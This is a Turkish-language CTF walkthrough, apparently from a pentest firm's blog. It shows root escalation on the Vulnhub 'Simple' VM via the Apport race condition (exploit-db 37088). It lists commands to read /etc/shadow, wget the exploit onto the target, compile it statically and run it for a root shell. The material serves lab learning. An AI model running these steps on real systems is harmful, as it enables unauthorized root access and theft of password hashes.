Apport – Ubuntu 14.04/14.10/15.04 İşletim Sistemindeki Hak Yükseltme Zafiyetinin (Race Condition) İstismar Edilerek root Yetkileri ile Komut Satırının Elde Edilmesi

0
273
views
Linux sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, Linux Kernel 3.16.0 işletim sistemine sahip Simple CTF sanal makinesi üzerinde çalışan bir zafiyet (Race Condition) istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda kullanılan Simple CTF sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/

Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www-data) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında Ubuntu 14.04.2 LTS kullanıldığı ve Linux çekirdek sürümü 3.16.0 olduğu görülmektedir.

uname -a
cat /etc/*release*

 

Linux Kernel 3.16.0’te kritik bir zafiyet bulunmaktadır. Bu zafiyeti istismar edecek kod exploit-db‘den indirilerek hedef sisteme aktarılacak ve çalıştırılacaktır.

https://www.exploit-db.com/exploits/37088/

 

Benzer olarak istismar kodu (ofs_32) Kernel-Exploits sitesinden de temin edilebilirdi.

https://www.kernel-exploits.com/

Veya, internetin olmadığı durumda ise Kali içerisindeki istismar kodu da kullanılabilirdi.

searchsploit 37088
ls -la /usr/share/exploitdb/platforms/linux/local/37088.c

 

Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.

ls
wget https://www.exploit-db.com/download/37088 –no-check-certificate -O IstismarKaynakKodu.c
ls -la

 

İstismar kodu derlenir.

gcc IstismarKaynakKodu.c -o HakYukseltme -static
ls -la

 

Sonrasında da zafiyetli sistemde çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./HakYukseltme
head -3 /etc/shadow
/bin/bash
id

 

Belirtilen zafiyetin bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:

  • Acid: Server: https://www.vulnhub.com/entry/acid-server,125/

 

Kaynak:

SecTalks: BNE0x03 – Simple. Vulnhub’s VM Walkthrough

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri